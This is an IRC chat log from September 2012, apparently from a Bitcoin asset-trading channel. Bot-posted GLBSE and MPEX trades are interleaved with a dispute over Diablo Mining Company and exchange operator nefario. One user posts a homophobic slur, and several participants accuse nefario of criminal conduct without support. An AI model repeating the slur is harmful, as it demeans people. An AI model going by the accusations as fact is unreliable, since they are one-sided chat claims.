0.09871001 = 0.4936 BTC [-] Sep 16 11:20:33 [GLBSE] [YABMC] 3 @ 0.090155 = 0.2705 BTC [-] Sep 16 11:20:34 [GLBSE] [YABMC] 3 @ 0.090155 = 0.2705 BTC [-] Sep 16 11:20:46 [GLBSE] [FDBF] 4 @ 0.15 = 0.6 BTC [+] Sep 16 11:22:01 [MPEX] [O.BTCUSD.P140T] 200 @ 0.27609778 = 55.2196 BTC [-] Sep 16 11:25:07 you are certainly keen to let us know about your feeling Sep 16 11:45:23 [GLBSE] [OBSI.HRPT] 76 @ 0.09871 = 7.502 BTC [-] Sep 16 11:45:53 [GLBSE] [FDBF] 48 @ 0.15 = 7.2 BTC [+] Sep 16 11:46:17 [GLBSE] [FDBF] 1 @ 0.15 BTC [+] Sep 16 11:50:37 [GLBSE] [OBSI.HRPT] 9 @ 0.09871002 = 0.8884 BTC [+] Sep 16 11:50:38 [GLBSE] [IBB] 2 @ 0.5897 = 1.1794 BTC [-] Sep 16 11:53:03 [GLBSE] [NYAN.B] 4 @ 0.99 = 3.96 BTC [+] Sep 16 11:56:00 [MPEX] [S.MPOE] 28200 @ 0.00040291 = 11.3621 BTC [+] Sep 16 12:02:30 usagi: mircea is fucking shit up Sep 16 12:02:35 TROLL FORCE ASSEMBLE! Sep 16 12:04:28 [GLBSE] [CIUCIU.MINING] 4 @ 0.0999 = 0.3996 BTC [+] Sep 16 12:04:52 [GLBSE] [MMM] 1 @ 0.91 BTC [-] Sep 16 12:04:53 [GLBSE] [MMM] 5 @ 0.9 = 4.5 BTC [-] Sep 16 12:15:33 ZETA-MINING: dividends for week 37.2012 paid, guaranteed pay-back price for week 38.2012 set to 0.093 Sep 16 12:18:45 ? Sep 16 12:19:01 apparently zeta paid dividends Sep 16 12:19:04 but I could be wrong Sep 16 12:19:43 what do i have to do with zeta ? Sep 16 12:19:57 nothing? Sep 16 12:20:26 [GLBSE] [OBSI.HRPT] 44 @ 0.09871002 = 4.3432 BTC [+] Sep 16 12:20:27 [GLBSE] [OBSI.HRPT] 16 @ 0.1 = 1.6 BTC [+] Sep 16 12:21:36 lolk Sep 16 12:23:01 [MPEX] [S.MPOE] 8726 @ 0.00040232 = 3.5106 BTC [-] Sep 16 12:23:03 [MPEX] [S.MPOE] 49874 @ 0.00040103 = 20.001 BTC [-] Sep 16 12:30:30 [GLBSE] [OBSI.HRPT] 1 @ 0.09999999 BTC [-] Sep 16 12:34:01 [MPEX] [S.MPOE] 10894 @ 0.00040291 = 4.3893 BTC [+] Sep 16 12:34:02 [MPEX] [S.MPOE] 12100 @ 0.00040323 = 4.8791 BTC [+] Sep 16 12:34:04 [MPEX] [S.MPOE] 2300 @ 0.00040575 = 0.9332 BTC [+] Sep 16 12:34:05 [MPEX] [S.MPOE] 8783 @ 0.00040583 = 3.5644 BTC [+] Sep 16 12:34:06 [MPEX] [S.MPOE] 16600 @ 0.00040654 = 6.7486 BTC [+] Sep 16 12:34:06 [MPEX] [S.MPOE] 2783 @ 0.00040693 = 1.1325 BTC [+] Sep 16 12:34:07 [MPEX] [S.MPOE] 50834 @ 0.0004071 = 20.6945 BTC [+] Sep 16 12:34:09 [MPEX] [S.MPOE] 25484 @ 0.00040978 = 10.4428 BTC [+] Sep 16 12:34:10 [MPEX] [S.MPOE] 54200 @ 0.00041136 = 22.2957 BTC [+] Sep 16 12:34:11 [MPEX] [S.MPOE] 11245 @ 0.0004116 = 4.6284 BTC [+] Sep 16 12:34:12 [MPEX] [S.MPOE] 59656 @ 0.00041237 = 24.6003 BTC [+] Sep 16 12:34:13 [MPEX] [S.MPOE] 55500 @ 0.00041273 = 22.9065 BTC [+] Sep 16 12:34:14 [MPEX] [S.MPOE] 42328 @ 0.00041555 = 17.5894 BTC [+] Sep 16 12:34:15 [MPEX] [S.MPOE] 247293 @ 0.00042 = 103.8631 BTC [+] Sep 16 12:36:01 [MPEX] [O.BTCUSD.C150T] 500 @ 0.05222251 = 26.1113 BTC [+] Sep 16 12:59:22 [GLBSE] [MPOE.ETF] 1 @ 1.33 BTC [-] Sep 16 13:02:01 [MPEX] [F.GIGA.ETF] 500 @ 0.00038674 = 0.1934 BTC [-] Sep 16 13:10:34 [GLBSE] [FDBF] 1 @ 0.15 BTC [+] Sep 16 13:26:26 !ticker FDBF Sep 16 13:26:27 [GLBSE:FDBF] [Bid: 0.147] [Ask: 0.15] [Spread: 0.003] [Last: 0.15] [24hVol: 22.5] [7dAvg: 0.14992452] Sep 16 13:31:22 [MPEX] [S.MPOE] 29300 @ 0.00041127 = 12.0502 BTC [-] Sep 16 13:35:05 [GLBSE] [FUTUREFUND] 3 @ 0.00012682 = 0.0004 BTC [+] Sep 16 13:43:01 [MPEX] [B.MPCD.C] 20000 @ 0.00090926 = 18.1852 BTC [-] Sep 16 13:56:33 "in a couple of years when bitcoins are worth thousands of dollars each" Sep 16 13:57:14 maybe a hundred is more realistic. Sep 16 13:57:32 mircea_popescu: you subscribed to dmc thread? Sep 16 13:57:40 im not on the forum Sep 16 13:57:58 damn Sep 16 13:58:03 thats some crazy shit Sep 16 13:58:05 any flash programmers here btw ? Sep 16 13:58:13 lolflash Sep 16 13:58:18 shh! Sep 16 13:58:43 i just came up with a decent tower defense game ideea, i wanna implement it. Sep 16 13:59:12 use html5. Sep 16 14:00:36 that'd work too. Sep 16 14:10:01 [MPEX] [F.GIGA.ETF] 1558 @ 0.00038674 = 0.6025 BTC [-] Sep 16 14:10:03 [MPEX] [F.GIGA.ETF] 3542 @ 0.00038 = 1.346 BTC [-] Sep 16 14:14:09 It`s Dividend Day today :D FDBF is paying dividend around 15:00 Sep 16 14:24:39 no, someone independently discovered what Ive thought for the past two months Sep 16 14:26:10 EskimoBob: people confuse bitcoins with buying power, and also confuse bitcoin as a currency Sep 16 14:28:19 how so? Sep 16 14:29:55 yeah, I posted it in the reponse to nefario Sep 16 14:31:51 I have voted???????? Sep 16 14:32:10 EskimoBob: I dont know Sep 16 14:32:32 just look at my recent posts Sep 16 14:32:48 should be on page 2 or 3 of that Sep 16 14:33:27 the contract wouldnt change Sep 16 14:33:50 but Im not sure if Ill take it off glbse or not Sep 16 14:34:11 nefario has basically said he doesnt care what the contract says, he will let shareholders violate it Sep 16 14:34:20 problem is, his train of thought can only effect dmc Sep 16 14:34:31 if he tries it against any mining op, they just take their hardware and go home Sep 16 14:34:49 several mining ops are seriously thinking about just leaving Sep 16 14:34:57 usagi: the plan already covered all of this Sep 16 14:35:32 no, the problem is I expected people to act rationally Sep 16 14:35:59 if I ever start another company, Im dealing with professional VCs only for funding Sep 16 14:36:01 [GLBSE] [BLUECHIP] 1 @ 0.1 BTC [+] Sep 16 14:36:04 usagi: thats the problem, none of it is new Sep 16 14:36:07 and its concurrent Sep 16 14:36:16 EskimoBob: both, actually Sep 16 14:36:21 EskimoBob: Ive heard both of those from people Sep 16 14:36:34 usagi: if we have spare solar, it gets sold. Sep 16 14:36:56 usagi: nope, we're selling dedis as part of a deal to gain a future customer Sep 16 14:37:14 usagi: you misread Sep 16 14:37:24 green and dc hasnt changed Sep 16 14:38:18 EskimoBob: yes... but the vast majority are bonds Sep 16 14:38:43 I wake up at 6 in the morning Sep 16 14:38:48 and this is what I see Sep 16 14:39:02 usagi: I cannot do that, that would put DMC in danger of abuse. Sep 16 14:39:21 why do you think I sold the fixed mhash bonds at a loss? Sep 16 14:39:30 to prevent further losses from abuse by bond issuers Sep 16 14:39:59 Damn it , Diablo. Sep 16 14:40:15 People believed in you. Sep 16 14:40:18 [GLBSE] [OBSI.HRPT] 4 @ 0.09999999 = 0.4 BTC [-] Sep 16 14:40:23 Bane_Capital: yes, and in turn I believed in people Sep 16 14:40:54 EskimoBob: being founder of a company is a very special thing Sep 16 14:41:12 EskimoBob: I never totally rely on people so that doesn't include me. Sep 16 14:41:12 usagi: it depends on nefario here Sep 16 14:41:29 usagi: a lot of people are seriously thinking about cutting and running if nefario goes through with this Sep 16 14:41:41 some are thinking of cutting and running no matter what the outcome is Sep 16 14:41:46 even if he does back down Sep 16 14:41:58 [GLBSE] [OBSI.HRPT] 20 @ 0.1 = 2 BTC [+] Sep 16 14:41:59 [GLBSE] [OBSI.HRPT] 40 @ 0.1 = 4 BTC [+] Sep 16 14:42:01 nefario abused the trust people placed in him Sep 16 14:42:28 no, he broke the contract the shareholders agreed to Sep 16 14:43:01 [MPEX] [F.GIGA.ETF] 4233 @ 0.00038 = 1.6085 BTC [-] Sep 16 14:43:02 [MPEX] [F.GIGA.ETF] 5267 @ 0.00037417 = 1.9708 BTC [-] Sep 16 14:43:39 If Diablo just maintained the value of his shares Sep 16 14:43:49 I don't think there would be any problem Sep 16 14:43:50 like I said, its all up to nefario here Sep 16 14:43:55 but he can't even do that right. Sep 16 14:44:05 usagi: not until the DC is done. Sep 16 14:44:30 I am voting no then if I am included in the vote. He's had his chance. Sep 16 14:44:31 usagi: we're not going through that again. Sep 16 14:44:33 He blew it. Sep 16 14:44:52 not at all, you already had your chance at that Sep 16 14:44:57 and _you_ blew it. Sep 16 14:45:08 usagi: yes, and the community is making their decision Sep 16 14:45:18 they will remove their assets from glbse if nefario cannot be trusted Sep 16 14:45:37 the panel is too little too late Sep 16 14:45:38 Nefario has several shareholders breathing down his back Sep 16 14:45:43 If Nefario fucks up, shit will ensue. Sep 16 14:46:17 Bane_Capital: but thats the thing, because nefario decided to abuse the trust people placed in him, a lot ofpeople are leaving Sep 16 14:46:22 usagi: Im not, I never asked them to leave Sep 16 14:46:32 they came to me to tell me this. Sep 16 14:46:44 no, some of these people are most decidedly not scammers. Sep 16 14:47:03 EskimoBob: not at all. Sep 16 14:47:16 the contracts the shareholders signed are no longer valid by decree of king nefario Sep 16 14:47:50 usagi: if they publicly out themselves, thats their choice, but I wont Sep 16 14:48:04 I have not broken the contract. Sep 16 14:48:42 usagi: I don't you will be changing this man's perspective. Sep 16 14:48:46 don't think* Sep 16 14:49:07 usagi: because I've already been given an offer of employment to continue DMC elsewhere and without bitcoin. Sep 16 14:50:17 EskimoBob: no, if this happens, the investors lose everything. Sep 16 14:50:22 motions on glbse suck. i can't even see that there is one, except when clicking on motions. even the mail-system shows me when there is a mail. Sep 16 14:50:41 usagi: Im seriously considering it, but its all up to nefario on this. Sep 16 14:51:01 [MPEX] [O.BTCUSD.P150N] 1 @ 0.50394018 BTC [-] Sep 16 14:51:24 usagi: problem is, you may say my contract isnt allowed anymore... but that would only mean my contract is grandfathered into it. Sep 16 14:51:43 the shareholders agreed to the contract, and so did nefario Sep 16 14:51:56 usagi: yes, and I already said it in the op post. Sep 16 14:52:31 OP is a faggot Sep 16 14:52:41 Bane_Capital: /b/ is ---> that way Sep 16 14:53:06 EskimoBob: fine, then shareholders can pay me a fair salary for my work. Sep 16 14:53:41 EskimoBob: if we're going to act all batshit insane, lets take to the logical conclusion Sep 16 14:54:57 usagi: yes, e) anything that furthers these goals Sep 16 14:55:23 I hate to tell you this, usagi, but you're not really a good business man. Sep 16 14:56:23 usagi: thats the thing, several pro VC people have actually liked the plan Sep 16 14:56:38 they just dont think bitcoin had a place, it is too much of a risk for so little return Sep 16 14:57:48 usagi: I think you misunderstood, I've been courting outside parties _for_ investment. Sep 16 14:57:57 as in real dollars. and lots of them. Sep 16 14:58:38 usagi: glbse's system is rather worthless for this Sep 16 14:58:43 nefario refuses to update contracts Sep 16 14:59:40 no, DMC needs a board, and theres simply not enough financially minded people in the community to do it, let alone ones invested in DMC Sep 16 15:00:02 You can try Sep 16 15:00:35 [GLBSE] [OBSI.HRPT] 1 @ 0.1009 BTC [+] Sep 16 15:01:02 ironic, I think quite a few people on the forums are insane Sep 16 15:01:12 they say shit that simply doesn't make sense Sep 16 15:01:34 usagi: and E is redundant Sep 16 15:01:35 [GLBSE] [OBSI.HRPT] 24 @ 0.10129 = 2.431 BTC [+] Sep 16 15:01:37 thats already covered by C Sep 16 15:01:58 and A is redundant, thats part of B Sep 16 15:02:12 so am I. Sep 16 15:02:26 all mining investments we own are just outsourcing the mining effort to third parties Sep 16 15:02:33 [GLBSE] [FDBF] 5 @ 0.15 = 0.75 BTC [+] Sep 16 15:02:36 Ill agree with that. Sep 16 15:02:58 EskimoBob: yes Sep 16 15:03:07 EskimoBob: I have no clue what dividends I've recieved since then Sep 16 15:03:50 "From this 1543.86 BTC in assets. BTCMC pays approximately 15 BTC a month, ABMO pays a little over 10 BTC a week, BTC-MINING pays a half a BTC a week. I expect any dividends issued by assets held by Diablo Mining Company to also be returned." Sep 16 15:05:16 EskimoBob: none Sep 16 15:05:39 EskimoBob: infact, until this nefario-bomb, I had assets waiting to be transferred into dmc's hands Sep 16 15:06:51 [GLBSE] [HYDRO.BONDS] 2 @ 1.3501 = 2.7002 BTC [-] Sep 16 15:06:53 [GLBSE] [HYDRO.BONDS] 2 @ 1.35 = 2.7 BTC [-] Sep 16 15:07:49 yes. Sep 16 15:08:02 DMC. Sep 16 15:11:22 [GLBSE] [PUREMINING] 10 @ 0.0947 = 0.947 BTC [-] Sep 16 15:11:46 EskimoBob: and yes, Im treating nefario like a criminal Sep 16 15:15:53 I am sure the shareholders of GLBSE would approve of this move. Sep 16 15:16:09 Good luck calling all of the shareholders criminals Sep 16 15:16:41 EskimoBob: not at all Sep 16 15:16:54 he made me think twice about my continued involvement in this company Sep 16 15:17:01 [MPEX] [F.GIGA.ETF] 444 @ 0.00037417 = 0.1661 BTC [-] Sep 16 15:17:02 [MPEX] [F.GIGA.ETF] 9111 @ 0.00037355 = 3.4034 BTC [-] Sep 16 15:17:03 [MPEX] [F.GIGA.ETF] 3200 @ 0.00037266 = 1.1925 BTC [-] Sep 16 15:17:04 [MPEX] [F.GIGA.ETF] 1045 @ 0.00037166 = 0.3884 BTC [-] Sep 16 15:17:28 Bane_Capital: you know thats not what I said, I do not believe nefario is acting in favor of the shareholders Sep 16 15:17:55 also, even if I DID mean that... wall street does it all the time, and the "criminals" keep throwing money at them Sep 16 15:18:02 so I guess it works for some people Sep 16 15:20:11 Bane_Capital: and I find it ironic you use the nick you do Sep 16 15:21:22 Well, I laughed Sep 16 15:21:30 Anyways, enjoy a gif Sep 16 15:21:32 http://i.imgur.com/mdHx9.gif Sep 16 15:22:05 oh, I thought that years ago Sep 16 15:22:52 lol Sep 16 15:22:58 My mind was still pure Sep 16 15:26:08 my mind was pure when super mario bros was still the best game on the NES. Sep 16 15:26:49 I dont think I started swearing at pixels until I discovered dragon warrior Sep 16 15:27:12 very few games are harder Sep 16 15:28:24 [GLBSE] [COGNITIVE] 8 @ 0.4849 = 3.8792 BTC [-] Sep 16 15:28:26 [GLBSE] [COGNITIVE] 86 @ 0.485 = 41.71 BTC [+] Sep 16 15:29:38 http://www.youtube.com/watch?feature=player_embedded&v=aMJNf9xA6uQ Sep 16 15:35:13 [GLBSE] [BDK.BND] 1 @ 0.098 BTC [+] Sep 16 15:48:00 [MPEX] [F.GIGA.ETF] 296 @ 0.00037166 = 0.11 BTC [-] Sep 16 15:48:02 [MPEX] [F.GIGA.ETF] 4929 @ 0.00036935 = 1.8205 BTC [-] Sep 16 15:48:49 [GLBSE] [MOORE] 2 @ 0.4949 = 0.9898 BTC [-] Sep 16 15:48:51 [GLBSE] [MOORE] 1 @ 0.495 BTC [+] Sep 16 15:51:38 [GLBSE] [PLATINUM] 50 @ 0.00999899 = 0.4999 BTC [+] Sep 16 15:51:40 [GLBSE] [PLATINUM] 6 @ 0.009999 = 0.06 BTC [+] Sep 16 15:51:40 [GLBSE] [PLATINUM] 44 @ 0.01 = 0.44 BTC [+] Sep 16 15:53:12 [GLBSE] [NYAN.B] 1 @ 0.989 BTC [-] Sep 16 15:55:11 [GLBSE] [NYAN.A] 2 @ 0.999999 = 2 BTC [+] Sep 16 15:56:37 [GLBSE] [MU] 10 @ 0.299 = 2.99 BTC [-] Sep 16 15:57:05 [GLBSE] [007] 1 @ 0.12 BTC [+] Sep 16 15:57:33 what a total CF this is Sep 16 15:58:23 usagi: gimme tldr version? Sep 16 15:58:27 usagi: Just enjoying my coffee. Sep 16 16:00:07 >implying he will raise further funds Sep 16 16:02:09 https://glbse.com/vote/view/127 Sep 16 16:02:17 That will likely be passed Sep 16 16:02:29 [GLBSE] [OBSI.HRPT] 7 @ 0.10125 = 0.7088 BTC [-] Sep 16 16:03:02 mornin. Sep 16 16:03:13 i smell drama. Sep 16 16:03:22 is it cooked yet Sep 16 16:03:43 :) Sep 16 16:03:47 wow Sep 16 16:04:08 All I can say is that this will be fun. Sep 16 16:07:15 Looks good usagi/Diablo Sep 16 16:08:21 This doesn't fix the core issue: "c) Buying solar power (possibly before mining hardware) and possibly reselling solar power into the grid should surplus exist." Sep 16 16:08:30 I would rather invest in Solyndra. Sep 16 16:09:06 some clarity and accountability go a long way. Sep 16 16:11:54 All I can say is that DMC better not break the .02 mark. Sep 16 16:13:24 http://www.youtube.com/watch?feature=player_embedded&v=SwUBq9CEpmw Sep 16 16:13:58 [MPEX] [F.GIGA.ETF] 6400 @ 0.00036935 = 2.3638 BTC [-] Sep 16 16:14:39 [GLBSE] [FUTUREFUND] 8 @ 0.00012682 = 0.001 BTC [+] Sep 16 16:15:48 Street performers can be paid well depending on their location Sep 16 16:16:27 If you can pick up $100 in tips a day Sep 16 16:16:30 It isn't so bad. Sep 16 16:17:24 Ha, I love beat coming from her feet Sep 16 16:17:30 She should just get some big heels Sep 16 16:18:02 the beat* Sep 16 16:18:36 [GLBSE] [OBSI.HRPT] 1 @ 0.10125 BTC [-] Sep 16 16:20:04 Usagi, you should just get yourself named as Co-CEO of DMC Sep 16 16:20:10 That would inspire some confidence. Sep 16 16:21:37 Unless that would be a risky suggestion Sep 16 16:21:42 IDK I'm just throwing things at the wall Sep 16 16:22:31 I know nothing. Sep 16 16:23:40 http://www.youtube.com/watch?feature=player_embedded&v=o1Sal6N5OiE Sep 16 16:28:06 Heh Sep 16 16:28:08 I clicked that Sep 16 16:28:12 expecting something new Sep 16 16:30:59 [GLBSE] [NASTY] 1 @ 0.5195 BTC [+] Sep 16 16:31:53 I think I figured out why I hate my father Sep 16 16:32:00 because he's a typical baby boomer Sep 16 16:32:39 you hate your father? Sep 16 16:32:44 :\ Sep 16 16:33:22 kakobreklaa: In a I'm joking way Sep 16 16:33:45 He just tells me I should be content working 40 hours at some shitty corporatist big box chain Sep 16 16:34:19 ah Sep 16 16:34:26 I don't work and I make the same money sitting on investments Sep 16 16:34:34 yet he gets butthurt about it Sep 16 16:34:45 well that is 'work' as well Sep 16 16:35:00 Well, he doesn't understand that. He grew up poor in rural Louisiana. Sep 16 16:35:27 Worked his way up the ladder. Doesn't know what capital is. Sep 16 16:35:38 heh Sep 16 16:35:41 He thinks a college education means something. Sep 16 16:36:03 He thinks people can get one today and walk out with a 80k a year job. Sep 16 16:36:08 Not anymore. Those days are over. Sep 16 16:36:35 We have to wait for The Matrix reboot before we see that again. Sep 16 16:36:41 to reboot* Sep 16 16:37:04 lol Sep 16 16:37:19 Then, then there comes to people who say "You should work the government and suck money from everyone's tax payments!" Sep 16 16:37:28 EVERYBODY SHOULD WORK FOR THE GOVERNMENT Sep 16 16:37:33 That will solve everything! Sep 16 16:37:38 hehe Sep 16 16:43:56 Smoovious: It's just like the housing bubble when you get to the depths of it Sep 16 16:44:00 [MPEX] [S.MPOE] 37800 @ 0.00040694 = 15.3823 BTC [-] Sep 16 16:44:31 /g 14 Sep 16 16:45:04 Definitely but people don't understand that. They just view it as something you have to do. Sep 16 16:45:22 The principle of it -- having a skill -- just doesn't dawn on them. Sep 16 16:45:45 It's about following instructions, getting approval and doing what you are told. That's how some people have been bred to live. Sep 16 16:45:55 That doesn't create an efficient high-tech society. Sep 16 16:46:15 It creates wage-slavery and debt but not wealth. Sep 16 16:46:37 That's what this has been about: Putting people in debt. Sep 16 16:47:02 [GLBSE] [FPGAMINING] 1 @ 0.5999 BTC [-] Sep 16 16:48:29 and that's why the system won't stand the test of time. Sep 16 16:48:35 It's just printing value. Sep 16 16:49:02 [GLBSE] [YABMC] 1 @ 0.0995 BTC [+] Sep 16 16:49:32 [GLBSE] [JTME] 1 @ 0.696969 BTC [+] Sep 16 16:51:49 Smoovious: I think China might be your thing. 3 out 5 students qualify to even go to college The Chinese test is in some ways like the American SAT, except that it lasts more than twice as long. The nine-hour test is offered just once a year and is the sole determinant for admission to virtually all Chinese colleges and universities. About three in five students make the cut. Sep 16 16:52:08 Add quotes starting at the third sentence. Sep 16 16:56:13 usagi: I am about to die from the mickey mouse part Sep 16 17:01:55 [GLBSE] [DMC] 1 @ 0.03999999 BTC [+] Sep 16 17:03:12 Okay, so DMC is now worth more than CPA? Sep 16 17:05:19 Nevermind then. Sep 16 17:10:23 I take it as Usagi making sure Diablo stays in line Sep 16 17:11:01 [MPEX] [S.MPOE] 11000 @ 0.00040693 = 4.4762 BTC [-] Sep 16 17:11:03 [MPEX] [S.MPOE] 24400 @ 0.00040693 = 9.9291 BTC [-] Sep 16 17:12:46 [GLBSE] [NYAN.C] 20 @ 0.3 = 6 BTC [-] Sep 16 17:16:23 [GLBSE] [DMC] 1 @ 0.03999999 BTC [+] Sep 16 17:16:25 [GLBSE] [DMC] 10 @ 0.04 = 0.4 BTC [+] Sep 16 17:17:07 [GLBSE] [NYAN.C] 30 @ 0.3 = 9 BTC [-] Sep 16 17:19:29 [GLBSE] [FDBF] 100 @ 0.15 = 15 BTC [+] Sep 16 17:20:29 [GLBSE] [ASICMINER] 10 @ 0.11389999 = 1.139 BTC [-] Sep 16 17:20:31 [GLBSE] [ASICMINER] 1 @ 0.1139 BTC [+] Sep 16 17:21:08 [GLBSE] [DMC] 2 @ 0.05999998 = 0.12 BTC [+] Sep 16 17:21:09 [GLBSE] [DMC] 14 @ 0.05999999 = 0.84 BTC [+] Sep 16 17:21:49 [GLBSE] [NYAN.C] 100 @ 0.3 = 30 BTC [-] Sep 16 17:23:27 [GLBSE] [DMC] 13 @ 0.05999999 = 0.78 BTC [+] Sep 16 17:23:29 [GLBSE] [DMC] 10 @ 0.06 = 0.6 BTC [+] Sep 16 17:26:25 usagi: if you want me to do dmc accounting or bookkeeping, it won't be as an employee. dmc would have to be a client of mine Sep 16 17:26:38 [GLBSE] [NYAN.B] 24 @ 0.98 = 23.52 BTC [-] Sep 16 17:27:58 If the btcusd exchange rate changes significantly, the fee would have to be adjusted Sep 16 17:28:10 as much as i would like to work for 1kusd/hour Sep 16 17:34:07 usagi: yeah, it seems we needi it. when i get to arizona, i'll register with the state and start a bitcoin accounting firm Sep 16 17:34:19 look out big four Sep 16 17:36:13 [GLBSE] [CBGB] 1 @ 0.5 BTC [+] Sep 16 17:38:25 [GLBSE] [PIMP] 40 @ 0.129999 = 5.2 BTC [+] Sep 16 17:40:37 [MPEX] [S.MPOE] 10200 @ 0.00040694 = 4.1508 BTC [+] Sep 16 17:45:16 !ticker ss Sep 16 17:45:20 !ticker mpoe.etf Sep 16 17:45:21 [GLBSE:SS] [Bid: 0.02] [Ask: 0.025] [Spread: 0.005] [Last: 0.025] [24hVol: 1.925] [7dAvg: 0.02101588] Sep 16 17:45:22 [GLBSE:MPOE.ETF] [Bid: 0.00180181] [Ask: 1.33999999] [Spread: 1.33819818] [Last: 1.33] [24hVol: 1.33] [7dAvg: 1.33] Sep 16 17:48:56 [GLBSE] [PUREMINING] 21 @ 0.0945 = 1.9845 BTC [-] Sep 16 17:48:57 [GLBSE] [PUREMINING] 36 @ 0.0948 = 3.4128 BTC [+] Sep 16 17:52:44 [GLBSE] [FPGAMINING] 8 @ 0.5999 = 4.7992 BTC [-] Sep 16 17:52:45 [GLBSE] [FPGAMINING] 20 @ 0.6 = 12 BTC [+] Sep 16 17:52:46 [GLBSE] [FPGAMINING] 10 @ 0.698 = 6.98 BTC [+] Sep 16 17:53:12 [GLBSE] [FPGAMINING] 9 @ 0.699 = 6.291 BTC [+] Sep 16 17:53:13 [GLBSE] [FPGAMINING] 1 @ 0.69998 BTC [+] Sep 16 17:53:14 [GLBSE] [FPGAMINING] 17 @ 0.69999999 = 11.9 BTC [+] Sep 16 18:00:15 o cool http://www.weusecoins.com/globe-bitcoin/ Sep 16 18:01:20 That IS cool Sep 16 18:02:33 ;;bc,stats Sep 16 18:02:59 Error: invalid syntax (, line 1) Sep 16 18:04:21 [GLBSE] [OBSI.HRPT] 2 @ 0.10125 = 0.2025 BTC [-] Sep 16 18:06:01 [MPEX] [F.GIGA.ETF] 1600 @ 0.00037 = 0.592 BTC [+] Sep 16 18:09:13 i can confirm the coolness of kakobreklaa's link Sep 16 18:11:50 i see one lonely node on madagascar Sep 16 18:16:10 lol Sep 16 18:16:17 I thought you were talking about that flash game Sep 16 18:16:19 Pandemic Sep 16 18:17:17 Bugpowder: bc,stat iirc Sep 16 18:17:21 ;;bc,stat Sep 16 18:17:21 Error: "bc,stat" is not a valid command. Sep 16 18:17:25 oh Sep 16 18:17:27 [GLBSE] [OBSI.HRPT] 4 @ 0.101 = 0.404 BTC [-] Sep 16 18:17:32 ;;bc,stats Sep 16 18:17:38 Current Blocks: 198973 | Current Difficulty: 2694047.952955 | Next Difficulty At Block: 199583 | Next Difficulty In: 610 blocks | Next Difficulty In About: 4 days, 2 hours, 6 minutes, and 30 seconds | Next Difficulty Estimate: 2803482.12356797 | Estimated Percent Change: 4.06207211319 Sep 16 18:18:33 The amount of computing power we have now is going to look pathetic in another year Sep 16 18:20:04 usagi: https://bitcointalk.org/index.php?topic=77469.msg1195650#msg1195650 Sep 16 18:20:04 The amount of computing power we will have in a year is going to look pathetic in another three years Sep 16 18:20:19 Maybe if we hit a roadblock in adoption Sep 16 18:20:43 hm Sep 16 18:26:09 !pl yabmc 0.3 Sep 16 18:26:09 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 16 18:26:16 YABMC [1@0.3BTC] paid: 0.08553271 BTC. Last price: 0.0995 BTC. Capital gain: -0.2005 BTC. Total: -0.11496729 BTC. (-38.3%) Sep 16 18:26:16 [GLBSE] [GSDPT] 500 @ 0.0034 = 1.7 BTC [+] Sep 16 18:26:40 !pl yabmc 0.2 Sep 16 18:26:40 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 16 18:26:43 YABMC [1@0.2BTC] paid: 0.08553271 BTC. Last price: 0.0995 BTC. Capital gain: -0.1005 BTC. Total: -0.01496729 BTC. (-7.5%) Sep 16 18:29:08 !pl Sep 16 18:29:09 !pl [@] [] Sep 16 18:29:36 !pl OBSI.HRPT 2000@0.098 2012-09-14 Sep 16 18:29:37 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 16 18:29:38 OBSI.HRPT [2000@0.098BTC] (since: 2012-09-14) paid: 4 BTC. Last price: 0.101 BTC. Capital gain: 6 BTC. Total: 1 BTC. (5.1%) Sep 16 18:30:13 eh? Sep 16 18:30:35 total of 4 and 6 is 1 Sep 16 18:30:47 new math Sep 16 18:30:51 lol Sep 16 18:30:52 v2.0 Sep 16 18:31:18 this is a quantum thingy. Sep 16 18:31:27 2k x 0.1 = 4 Sep 16 18:31:31 that's better even Sep 16 18:32:04 Who made that script? Sep 16 18:32:11 Diablo-D3 Sep 16 18:32:13 could you tell ? Sep 16 18:32:15 ah Sep 16 18:32:16 :) Sep 16 18:32:17 lol no Sep 16 18:32:19 <- Sep 16 18:32:23 its a trailing zero issue Sep 16 18:33:07 you're not one of the core bitcoin coders I hope? ;) Sep 16 18:33:42 SHHHHH Sep 16 18:35:00 [MPEX] [F.GIGA.ETF] 12600 @ 0.00037 = 4.662 BTC [+] Sep 16 18:35:30 That's why pirate didn't repay... suddenly his trailing zeroes were gone Sep 16 18:38:34 http://www.youtube.com/watch?feature=player_embedded&v=Us_oN8C6Ezg Sep 16 18:40:43 [GLBSE] [BFLS] 2 @ 0.885 = 1.77 BTC [+] Sep 16 18:41:46 [GLBSE] [BFLS] 1 @ 0.89 BTC [+] Sep 16 18:42:47 [GLBSE] [BFLS] 1 @ 0.9 BTC [+] Sep 16 18:42:49 [GLBSE] [BFLS] 5 @ 0.9 = 4.5 BTC [+] Sep 16 18:47:25 !pl OBSI.HRPT 2000@0.098 2012-09-14 Sep 16 18:47:26 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 16 18:47:33 OBSI.HRPT [2000@0.098BTC] (since: 2012-09-14) paid: 4 BTC. Last price: 0.101 BTC. Capital gain: 6 BTC. Total: 10 BTC. (5.1%) Sep 16 18:47:38 thar. Sep 16 18:47:40 is glbse not working right for anyone else? Sep 16 18:47:48 its working for assbot i guess Sep 16 18:49:22 novusordo, works here Sep 16 18:49:53 [GLBSE] [BFLS] 5 @ 0.9 = 4.5 BTC [+] Sep 16 18:49:57 [GLBSE] [FUTUREFUND] 7 @ 0.00012682 = 0.0009 BTC [+] Sep 16 18:51:07 i had changed some flags in chrome to get that webgl globe to work, maybe that was it Sep 16 18:52:27 [GLBSE] [DMC] 1 @ 0.06499999 BTC [+] Sep 16 18:52:28 [GLBSE] [DMC] 14 @ 0.065 = 0.91 BTC [+] Sep 16 19:00:01 [MPEX] [S.MPOE] 11800 @ 0.00040694 = 4.8019 BTC [+] Sep 16 19:00:02 [MPEX] [S.MPOE] 22700 @ 0.00040694 = 9.2375 BTC [+] Sep 16 19:00:04 [MPEX] [S.MPOE] 25826 @ 0.00040694 = 10.5096 BTC [+] Sep 16 19:17:31 [GLBSE] [OBSI.HRPT] 10 @ 0.10125 = 1.0125 BTC [+] Sep 16 19:20:21 [GLBSE] [OBSI.HRPT] 140 @ 0.0988 = 13.832 BTC [-] Sep 16 19:21:37 [GLBSE] [GIGAMINING] 11 @ 0.6209 = 6.8299 BTC [-] Sep 16 19:23:11 [GLBSE] [GIGAMINING] 8 @ 0.621 = 4.968 BTC [+] 